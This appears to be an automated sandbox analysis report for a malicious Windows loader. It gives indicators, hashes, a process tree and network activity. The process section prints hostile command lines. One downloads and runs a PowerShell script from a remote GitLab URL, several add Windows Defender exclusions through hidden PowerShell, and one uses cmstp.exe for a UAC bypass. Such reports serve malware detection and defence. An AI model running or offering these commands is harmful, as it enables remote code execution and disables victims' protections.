File name:

loader.exe

Full analysis: https://app.any.run/tasks/8b876f7a-c70f-45b4-ad2b-79c28228ae74
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: April 04, 2026, 03:06:16
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
python
arch-exec
arch-doc
smb
scan
smbscan
loader
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
MD5:

6F5F0083873606EF3656D9A0A2A62A16

SHA1:

80742CFD8FDE8632694E4CC5B283F17188A57522

SHA256:

E6C0E85BD1B6E03EA4B1823F73188BD95BF986201CF45A932F26D486CAACDA25

SSDEEP:

768:1qeJWZdFE2ECEL8JRLgl2jVPVEWs8nvynqflSRnVXbOfC1TkIc/e1:kg2ECELcL6UVPVEWs8nvy2AbO3IcC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Known privilege escalation attack

      • dllhost.exe (PID: 5768)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 2684)
      • powershell.exe (PID: 6672)

    • Adds process to the Windows Defender exclusion list

      • cmd.exe (PID: 2220)
      • cmd.exe (PID: 7560)
      • ap.exe (PID: 5384)
      • hxxo.exe (PID: 3140)

    • Changes Windows Defender settings

      • cmd.exe (PID: 2220)
      • cmd.exe (PID: 7560)
      • ap.exe (PID: 5384)
      • hxxo.exe (PID: 3140)
      • OneDrive.exe (PID: 19952)

    • Changes powershell execution policy (Bypass)

      • pythonw.exe (PID: 7260)
      • ap.exe (PID: 5384)
      • hxxo.exe (PID: 3140)
      • OneDrive.exe (PID: 19952)

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 7560)
      • ap.exe (PID: 5384)
      • hxxo.exe (PID: 3140)
      • OneDrive.exe (PID: 19952)

    • SMBSCAN has been detected (SURICATA)

      • elonmusk.exe (PID: 7116)

  • SUSPICIOUS

    • Reads the date of Windows installation

      • loader.exe (PID: 8128)
      • loader.exe (PID: 3380)
      • ap.exe (PID: 5384)
      • hxxo.exe (PID: 3140)
      • OneDrive.exe (PID: 19952)

    • Application launched itself

      • loader.exe (PID: 8128)
      • powershell.exe (PID: 7408)
      • powershell.exe (PID: 6672)
      • powershell.exe (PID: 6240)
      • powershell.exe (PID: 7724)
      • elonmusk.exe (PID: 4112)

    • Downloads file from URI via Powershell

      • powershell.exe (PID: 7408)
      • powershell.exe (PID: 1312)
      • powershell.exe (PID: 6240)
      • powershell.exe (PID: 7724)
      • powershell.exe (PID: 7624)

    • Starts POWERSHELL.EXE for commands execution

      • loader.exe (PID: 3380)
      • powershell.exe (PID: 7408)
      • cmd.exe (PID: 2220)
      • pythonw.exe (PID: 7260)
      • powershell.exe (PID: 6672)
      • cmd.exe (PID: 7560)
      • powershell.exe (PID: 6240)
      • powershell.exe (PID: 7724)
      • ap.exe (PID: 5384)
      • hxxo.exe (PID: 3140)
      • OneDrive.exe (PID: 19952)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 7408)
      • powershell.exe (PID: 1312)
      • powershell.exe (PID: 6240)

    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 7408)
      • powershell.exe (PID: 1312)
      • powershell.exe (PID: 6240)
      • powershell.exe (PID: 7724)

    • Checks a user's role membership (POWERSHELL)

      • powershell.exe (PID: 7408)
      • powershell.exe (PID: 6240)
      • powershell.exe (PID: 7724)

    • The process drops C-runtime libraries

      • powershell.exe (PID: 1312)
      • elonmusk.exe (PID: 4112)

    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 1312)

    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 1312)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1312)
      • powershell.exe (PID: 7724)
      • elonmusk.exe (PID: 4112)
      • ap.exe (PID: 5384)

    • Process drops python dynamic module

      • powershell.exe (PID: 1312)
      • elonmusk.exe (PID: 4112)

    • Loads Python modules

      • pythonw.exe (PID: 7900)
      • pythonw.exe (PID: 7260)
      • elonmusk.exe (PID: 7116)

    • Probably UAC bypass using CMSTP.exe (Connection Manager service profile)

      • pythonw.exe (PID: 7900)

    • Used cmstp for execute code hidden within an inf file

      • pythonw.exe (PID: 7900)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 7324)
      • cscript.exe (PID: 1296)

    • Uses TASKKILL.EXE to kill process

      • dllhost.exe (PID: 5768)
      • cmd.exe (PID: 4104)

    • Executing commands from ".cmd" file

      • pythonw.exe (PID: 7260)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2220)
      • cmd.exe (PID: 4104)
      • cmd.exe (PID: 7560)

    • Adds exclusion path to Windows Defender (POWERSHELL)

      • cmd.exe (PID: 2220)
      • cmd.exe (PID: 7560)
      • ap.exe (PID: 5384)
      • hxxo.exe (PID: 3140)
      • OneDrive.exe (PID: 19952)

    • Script adds exclusion process to Windows Defender

      • cmd.exe (PID: 2220)
      • cmd.exe (PID: 7560)
      • ap.exe (PID: 5384)
      • hxxo.exe (PID: 3140)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6672)
      • powershell.exe (PID: 880)
      • powershell.exe (PID: 13912)
      • powershell.exe (PID: 18940)
      • powershell.exe (PID: 19720)
      • powershell.exe (PID: 19912)
      • powershell.exe (PID: 20264)
      • powershell.exe (PID: 20136)

    • Base64-obfuscated command line is found

      • pythonw.exe (PID: 7260)

    • BASE64 encoded PowerShell command has been detected

      • pythonw.exe (PID: 7260)

    • Executing commands from a ".bat" file

      • cscript.exe (PID: 1296)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 7724)

    • Possible path obfuscation (POWERSHELL)

      • powershell.exe (PID: 7724)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 7724)

    • Likely accesses (executes) a file from the Public directory

      • powershell.exe (PID: 880)
      • OneDrive.exe (PID: 19952)

    • Starts a Microsoft application from unusual location

      • ap.exe (PID: 5384)
      • hxxo.exe (PID: 3140)
      • OneDrive.exe (PID: 19952)

    • Potential Corporate Privacy Violation

      • elonmusk.exe (PID: 7116)

    • The process executes via Task Scheduler

      • OneDrive.exe (PID: 19952)

  • INFO

    • Checks supported languages

      • loader.exe (PID: 8128)
      • loader.exe (PID: 3380)
      • pythonw.exe (PID: 7900)
      • pythonw.exe (PID: 7260)
      • ap.exe (PID: 5384)
      • hxxo.exe (PID: 3140)
      • elonmusk.exe (PID: 4112)
      • elonmusk.exe (PID: 7116)
      • OneDrive.exe (PID: 19952)

    • Create files in a temporary directory

      • loader.exe (PID: 8128)
      • loader.exe (PID: 3380)
      • pythonw.exe (PID: 7900)
      • pythonw.exe (PID: 7260)
      • elonmusk.exe (PID: 4112)
      • elonmusk.exe (PID: 7116)

    • Reads the computer name

      • loader.exe (PID: 8128)
      • loader.exe (PID: 3380)
      • hxxo.exe (PID: 3140)
      • ap.exe (PID: 5384)
      • elonmusk.exe (PID: 4112)
      • elonmusk.exe (PID: 7116)
      • OneDrive.exe (PID: 19952)

    • Reads the machine GUID from the registry

      • loader.exe (PID: 8128)
      • loader.exe (PID: 3380)
      • hxxo.exe (PID: 3140)
      • OneDrive.exe (PID: 19952)

    • Reads security settings of Internet Explorer

      • loader.exe (PID: 8128)
      • loader.exe (PID: 3380)
      • cscript.exe (PID: 1296)
      • ap.exe (PID: 5384)
      • hxxo.exe (PID: 3140)
      • OneDrive.exe (PID: 19952)

    • Reads Environment values

      • loader.exe (PID: 8128)
      • loader.exe (PID: 3380)

    • Disables trace logs

      • powershell.exe (PID: 7408)
      • powershell.exe (PID: 1312)
      • cmstp.exe (PID: 2532)
      • powershell.exe (PID: 6240)
      • powershell.exe (PID: 7724)
      • powershell.exe (PID: 7624)

    • Using PowerShell for GZIP File Operations

      • powershell.exe (PID: 7408)
      • powershell.exe (PID: 1312)
      • powershell.exe (PID: 6240)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 7408)
      • powershell.exe (PID: 6240)
      • powershell.exe (PID: 7724)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 7408)
      • powershell.exe (PID: 1312)
      • powershell.exe (PID: 6240)

    • Using PowerShell for ZIP File Operations

      • powershell.exe (PID: 1312)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 1312)
      • powershell.exe (PID: 2684)
      • powershell.exe (PID: 1140)
      • powershell.exe (PID: 664)
      • powershell.exe (PID: 7724)
      • powershell.exe (PID: 880)
      • powershell.exe (PID: 13912)
      • powershell.exe (PID: 19720)
      • powershell.exe (PID: 19912)
      • powershell.exe (PID: 18940)
      • powershell.exe (PID: 20136)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 1312)
      • powershell.exe (PID: 7724)

    • The sample compiled with english language support

      • powershell.exe (PID: 1312)
      • elonmusk.exe (PID: 4112)

    • The executable file from the user directory is run by the Powershell process

      • pythonw.exe (PID: 7900)
      • ap.exe (PID: 5384)
      • hxxo.exe (PID: 3140)
      • elonmusk.exe (PID: 4112)

    • Python executable

      • pythonw.exe (PID: 7900)
      • pythonw.exe (PID: 7260)

    • Checks transactions between databases Windows and Oracle

      • cmstp.exe (PID: 2532)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1140)
      • powershell.exe (PID: 664)
      • powershell.exe (PID: 13912)
      • powershell.exe (PID: 880)
      • powershell.exe (PID: 19720)
      • powershell.exe (PID: 18940)
      • powershell.exe (PID: 19912)

    • Remote server returned an error (POWERSHELL)

      • powershell.exe (PID: 7624)

    • Attempt to connect to SMB server

      • elonmusk.exe (PID: 7116)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Generic CIL Executable (.NET, Mono, etc.) (55.8)
.exe | Win64 Executable (generic) (21)
.scr | Windows screen saver (9.9)
.dll | Win32 Dynamic Link Library (generic) (5)
.exe | Win32 Executable (generic) (3.4)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2026:04:04 03:05:25+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 11
CodeSize: 31744
InitializedDataSize: 2048
UninitializedDataSize: -
EntryPoint: 0x9a3e
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 0.0.0.0
ProductVersionNumber: 0.0.0.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
FileDescription:
FileVersion: 0.0.0.0
InternalName: loader.exe
LegalCopyright:
OriginalFileName: loader.exe
ProductVersion: 0.0.0.0
AssemblyVersion: 0.0.0.0
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
187
Monitored processes
52
Malicious processes
18
Suspicious processes
1

Behavior graph

Click at the process to see the details
start loader.exe no specs loader.exe no specs powershell.exe conhost.exe no specs powershell.exe conhost.exe no specs pythonw.exe no specs cmstp.exe no specs CMSTPLUA wscript.exe no specs pythonw.exe no specs taskkill.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs taskkill.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs cscript.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe conhost.exe no specs powershell.exe conhost.exe no specs ap.exe hxxo.exe no specs powershell.exe no specs conhost.exe no specs elonmusk.exe #SMBSCAN elonmusk.exe powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs onedrive.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
664powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
880"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\OneDrive.exe'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeap.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
1108\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1140powershell.exe -Command "Add-MpPreference -ExclusionProcess 'powershell.exe'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1296"C:\Windows\System32\cscript.exe" //nologo "C:\Users\admin\AppData\Local\Temp\idk.vbs" "C:\Users\admin\AppData\Local\Temp\skibidi.bat"C:\Windows\System32\cscript.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Console Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\cscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1312"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -c iex (iwr https://gitlab.com/haingng16/sigmatoilet/-/raw/main/uac -UseBasicParsing) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\msvcp_win.dll
1404\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2220cmd.exe /c C:\Users\admin\AppData\Local\Temp\WinDefConfig.cmdC:\Windows\System32\cmd.exepythonw.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
2532cmstp.exe /au "C:\Users\admin\AppData\Local\Temp\lkdjbpuvbs.inf"C:\Windows\System32\cmstp.exepythonw.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile Installer
Exit code:
0
Version:
7.2.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmstp.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
2684powershell -W Hidden -C "Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EA 0; Add-MpPreference -ExclusionProcess 'powershell.exe' -EA 0; Add-MpPreference -ExclusionProcess 'python.exe' -EA 0; Add-MpPreference -ExclusionProcess 'pythonw.exe' -EA 0; " C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
Total events
103 968
Read events
103 956
Write events
12
Delete events
0

Modification events

(PID) Process:(2532) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2532) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(2532) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(2532) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:FileTracingMask
Value:
(PID) Process:(2532) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(2532) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(2532) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(5768) dllhost.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\3d\52C64B7E
Operation:writeName:@%SystemRoot%\system32\cmlua.dll,-100
Value:
Connection Manager
(PID) Process:(5768) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmmgr32.exe
Operation:writeName:ProfileInstallPath
Value:
C:\ProgramData\Microsoft\Network\Connections\Cm
(PID) Process:(5768) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
Operation:writeName:SM_AccessoriesName
Value:
Accessories
Executable files
106
Suspicious files
7
Text files
79
Unknown types
0

Dropped files

PID
Process
Filename
Type
8128loader.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vsbsfrgn.r5g.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3380loader.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_b11n3ukq.rdq.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1312powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_h5c44ebj.qyb.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1312powershell.exeC:\Users\admin\AppData\Roaming\Google\python\pythonw.exeexecutable
MD5:CE34CDA31EAE4589F5B158253DD55F54
SHA256:58B39B6D8DC9F51A94F1A3143E49B7498FB804A101F2B33BAA14BD72D45298F8
1312powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hh21oyto.aj0.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8128loader.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_beeubtwi.xk1.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7408powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_50oe4adw.c0r.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3380loader.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1zkmmyy4.2vs.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7408powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ls4bnp0w.tr5.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7408powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:CDB6E241B2673AA24A8E0EF2A6D7FF3A
SHA256:03E5FF695D1A469F4635FBC33D7C3E4ED5CF6B54C30E4E18E01C101F694F5DF4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
34
TCP/UDP connections
20 413
DNS requests
26
Threats
40

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5276
MoUsoCoreWorker.exe
GET
304
40.127.240.158:443
https://settings-win.data.microsoft.com/settings/v3.0/OneSettings/Client?OSVersionFull=10.0.19045.4046.amd64fre.vb_release.191206-1406&LocalDeviceID=s%3ABAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&FlightRing=Retail&AttrDataVer=186&OSUILocale=en-US&OSSkuId=48&App=WOSC&AppVer=&IsFlightingEnabled=0&TelemetryLevel=1&DeviceFamily=Windows.Desktop
US
whitelisted
5276
MoUsoCoreWorker.exe
GET
304
40.127.240.158:443
https://settings-win.data.microsoft.com/settings/v3.0/wsd/muse?ProcessorClockSpeed=3094&FlightIds=&UpdateOfferedDays=4294967295&BranchReadinessLevel=CB&OEMManufacturerName=DELL&IsCloudDomainJoined=0&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&sku=48&ActivationChannel=Retail&AttrDataVer=186&IsMDMEnrolled=0&ProcessorCores=6&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&TotalPhysicalRAM=6144&PrimaryDiskType=4294967295&FlightingBranchName=&ChassisTypeId=1&OEMModelNumber=DELL&SystemVolumeTotalCapacity=260281&sampleId=95271487&deviceClass=Windows.Desktop&App=muse&DisableDualScan=0&AppVer=10.0&OEMSubModel=J5CR&locale=en-US&IsAlwaysOnAlwaysConnectedCapable=0&ms=0&DefaultUserRegion=244&UpdateServiceUrl=http%3A%2F%2Fneverupdatewindows10.com&osVer=10.0.19045.4046.amd64fre.vb_release.191206-1406&os=windows&deviceId=s%3ABAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&DeferQualityUpdatePeriodInDays=0&ring=Retail&DeferFeatureUpdatePeriodInDays=30
US
whitelisted
3140
SIHClient.exe
GET
304
74.178.76.128:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
US
whitelisted
3140
SIHClient.exe
GET
200
74.178.240.51:443
https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping
US
whitelisted
3140
SIHClient.exe
GET
200
74.178.76.128:443
https://slscr.update.microsoft.com/sls/ping
US
whitelisted
3140
SIHClient.exe
GET
304
74.178.76.128:443
https://slscr.update.microsoft.com/SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
US
whitelisted
GET
200
204.79.197.203:80
http://oneocsp.microsoft.com/ocsp/MFQwUjBQME4wTDAJBgUrDgMCGgUABBQ3L3%2F%2Fa6ADK8NraY2GXzVaYrHG4AQUb6t%2B2v%2BXQ3LsO2d33oJhNYhHQoUCEzMAAAAGb6JMMcOVb6sAAAAAAAY%3D
US
binary
959 b
whitelisted
5392
svchost.exe
GET
200
20.73.194.208:443
https://settings-win.data.microsoft.com/settings/v3.0/WSD/WaaSAssessment?os=Windows&osVer=10.0.19041.1.amd64fre.vb_release.191206-&ring=Retail&sku=48&deviceClass=Windows.Desktop&locale=en-US&deviceId=BAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&FlightRing=Retail&TelemetryLevel=1&HidOverGattReg=C%3A%5CWINDOWS%5CSystem32%5CDriverStore%5CFileRepository%5Chidbthle.inf_amd64_9610b4821fdf82a5%5CMicrosoft.Bluetooth.Profiles.HidOverGatt.dll&AppVer=10.0&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&OEMModel=DELL&UpdateOfferedDays=4294967295&ProcessorManufacturer=AuthenticAMD&InstallDate=1661339444&OEMModelBaseBoard=&BranchReadinessLevel=CB&OEMSubModel=J5CR&IsCloudDomainJoined=0&DeferFeatureUpdatePeriodInDays=30&IsDeviceRetailDemo=0&FlightingBranchName=&OSUILocale=en-US&DeviceFamily=Windows.Desktop&WuClientVer=10.0.19041.3996&UninstallActive=1&IsFlightingEnabled=0&OSSkuId=48&ProcessorClockSpeed=3094&TotalPhysicalRAM=6144&SecureBootCapable=0&App=WaaSAssessment&ProcessorCores=6&CurrentBranch=vb_release&InstallLanguage=en-US&DeferQualityUpdatePeriodInDays=0&ServicingBranch=CB&OEMName_Uncleaned=DELL&TPMVersion=0&PrimaryDiskTotalCapacity=262144&InstallationType=Client&AttrDataVer=186&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&IsEdgeWithChromiumInstalled=1&OSVersion=10.0.19045.4046&IsMDMEnrolled=0&ActivationChannel=Retail&HonorWUfBDeferrals=1&FirmwareVersion=A.40&TrendInstalledKey=1&OSArchitecture=AMD64&DefaultUserRegion=244&UpdateManagementGroup=2
US
text
5.74 Kb
whitelisted
GET
200
23.11.41.157:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAjTxtAB8my1oj8MfWpz%2F7Y%3D
NL
binary
313 b
whitelisted
5392
svchost.exe
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
